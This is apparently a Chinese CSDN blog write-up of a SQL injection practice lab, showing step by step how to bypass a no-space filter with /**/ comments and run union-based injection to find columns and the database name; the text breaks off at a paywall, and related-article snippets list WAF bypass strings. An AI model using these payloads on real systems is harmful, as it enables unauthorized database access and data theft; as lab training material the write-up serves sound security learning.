SQL靶场练习之二(空格绕过、报错注入)

最新推荐文章于 2024-05-31 11:01:37 发布
最新推荐文章于 2024-05-31 11:01:37 发布
阅读量728 收藏 2
点赞数
分类专栏: SQL 文章标签: sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Lorezon/article/details/103992602
版权
本文介绍了SQL靶场练习中的空格绕过方法,通过在URL后添加特殊字符实现绕过。接着展示了如何判断SQL注入的存在,并探讨了字段、回显点的判断。此外,文章还详细讲解了查询数据库名、表名及内容的过程,以及报错注入的识别和利用,最后展示了查询flag值的步骤。
摘要由CSDN通过智能技术生成

空格绕过

初始页面是这样的:
在这里插入图片描述

0x00判断是否存在注入

name后面加个单引号,发现页面返回异常:
在这里插入图片描述判断存在注入。

0x02常规拼接

name’ and 1=1
在这里插入图片描述返回异常,显示ERROR NO SPACE,错误无空格。想办法把空格取代掉,使用/**/拼接语句name’/**/and/**/1=1%23
在这里插入图片描述页面返回正常,说明绕过成功。

0x03判断字段

name’/**/order/**/by/**/5%23,页面返回正常,将5改成6则返回错误:
在这里插入图片描述说明字段为5。

0x04判断回显点

name’/**/union/**/select/**/1,2,3,4,5%23
在这里插入图片描述回显点为1,2,3.

0x05查询数据库名

name’/**/union/**/select/**/1,database(),3,4,5%23
在这里插入图片描述查询到数据库名为:erercises

0x06查询数据库中表名

name’/**/union/**/select/**/1,group_concat
最低0.47元/天 解锁文章
Sure_lis
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL Injection绕过技巧
weixin_34261739的博客
08-15 1135
0x00 sql注入的原因 sql注入的原因,表面上说是因为 拼接字符串,构成sql语句,没有使用 sql语句预编译,绑定变量。 但是更深层次的原因是,将用户输入的字符串,当成了 “sql语句” 来执行。 比如上面的 String sql = "select id,no from user where id=" + id; 我们希望用户输入的 id 的值,仅仅作为一个字符串字面值,传入数据库执行,...
sql注入绕过union select过滤
烟敛寒林的博客
11-09 6161
# # # #WAF Bypassing Strings: /*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UN...
sql注入之select/union select
@一只躺平的猪@的博客
07-14 3016
select :select 1 from table、 select count(1) from table、select sum(1) from table union select:union语句使用条件、判断字段数 union select 1,2(或union select null,null)、 判断回显位置
绕过空格限制的方法
xf3401837266的博客
05-31 387
在Web安全领域,特别是在尝试绕过过滤或逃避Web应用防火墙(WAF)的限制时,绕过空格过滤是常见的攻击技巧之一。
【转】突破sql 注入过滤Union+SELECT 继续射下去
玄冰幽阁
02-01 759
前几今天遇到一个bt 的老外注射点:   //*ps 此点目前流行的注射工具射不 *//   http://cleopatra-sy.com/index.php?content=more_product&id=17      http://cleopatra-sy.com/index.php?content=more_product&id=17 and 1=1  正常   http:
select绕过
devil8123665的博客
11-22 1414
#WAFBypassingStrings: /*!%55NiOn*//*!%53eLEct*/ %55nion(%53elect1,2,3)--- +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNIONSELECT*//**/ /**//*!50000UNIONSELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!5000...
SQL注入漏洞-03】报错注入靶场实战
cc
02-02 6346
在注入点的判断过程,发现数据库SQL语句的报错信息,会显示在页面,因此可以进行报错注入 报错注入的原理:就是在错误信息执行SQL语句。触发报错的方式很多,具体细节也不尽相同。报错注入有可能成功,也有可能不成功!可以多刷新几次
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
墨者靶场 post ,DB2,绕过登录,sql注入四关
最新发布
07-22
### 墨者靶场 Post、DB2、绕过登录及SQL注入四关攻略 #### 一、前言 在网络安全领域,靶场是检验安全技术能力的重要平台之一。本次攻略将详细介绍墨者靶场的Post、DB2、绕过登录及SQL注入四个挑战关卡的解决方法...
SQL注入技巧之显注与盲注过滤逗号绕过详析
09-09
SQL注入的绕过技巧有很多,下面这篇文章主要给大家介绍了关于SQL注入技巧之显注与盲注过滤逗号绕过的相关资料,文通过示例代码介绍的非常详细,需要的朋友们下面随着小编来一起学习学习吧
web-报错注入-皮卡丘靶场
07-15
在Web应用报错注入通常是由于不安全的SQL查询处理导致的。 在皮卡丘靶场,我们可以看到几种不同类型的报错注入示例: 1. **Insert(POST请求的报错注入)**: 攻击者利用`POST`请求发送Payload `' and ...
SQL注入,注释#、 --+、 --%20、 %23到底是什么意思?sqli-labs-master
热门推荐
weixin_43096078的博客
08-25 2万+
1.# 和 -- (有个空格)表示注释,可以使它们后面的语句不被执行。在url,如果是get请求**(记住是get请求,也就是我们在浏览器输入的url)** ,解释执行的时候,url#号是用来指导浏览器动作的,对服务器端无用。所以,HTTP请求不包括#,因此使用#闭合无法注释,会报错;而使用-- (有个空格),在传输过程空格会被忽略,同样导致无法注释,所以在get请求传参注入时才会使用--+的方式来闭合,因为+会被解释成空格。 2.当然,也可以使用--%20,把空格转换为urlencode编码格式
SQL注入实战:绕过操作
ting_liang的博客
01-27 2184
preg replace(mixed $pattern, mixed $replacement, mixed$subject):执行-个正则表达式的搜索和替换。id=1 && 1=1或者?可以利用网络的开源的URL在线编码,绕过SQL注入的过滤机制。1、大小写变形,Or,OR,oR,And,ANd,aND等-代码大小写不敏感都剔除。3、利用符号代替--and --&& --or--|| 等。5、网站的每个数据层的编码统一,建议全部使用utf-8编码。
半小时了解SQL注入漏洞?(注入方式大全+绕过大全)
Karka_的博客
03-11 1010
🏆今日学习目标:🍀学习了解sql注入漏洞✅创作者:贤鱼⏰预计时间:35分钟具体详细介绍在专栏有单独介绍,可以查看只有了解才能注入。
sql注入的union联合查询,union select 1,2,3
m0_51756263的博客
07-10 9082
sql注入的union联合查询,union select 1,2,3
报错注入绕过sql注入检测机制的一点思路
坚持硬核
01-28 507
相关的sql函数说明: rand() 用于产生一个0到1之间的随机数 floor() 向下取整 floor(rand()) 得到的值永远为0 floor(rand()*2) 得到的值可能为1可能为0 select floor(rand()*2) from 有很多数据的表名 有多少条数据就生成多少个0或者1,并且重复执行这句话,结果无法复现 但是如果给rand()传入一个随机数种子,比如0,反复执行结果是可以复现,生成的是比较固定的伪随机数:011011001110 select co
SQL注入(报错,注入绕过
m0_62886641的博客
04-23 308
复习笔记,欢迎大佬指正
sql注入 之 报错注入 练习
qq_41619455的博客
08-02 298
sql 报错注入
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值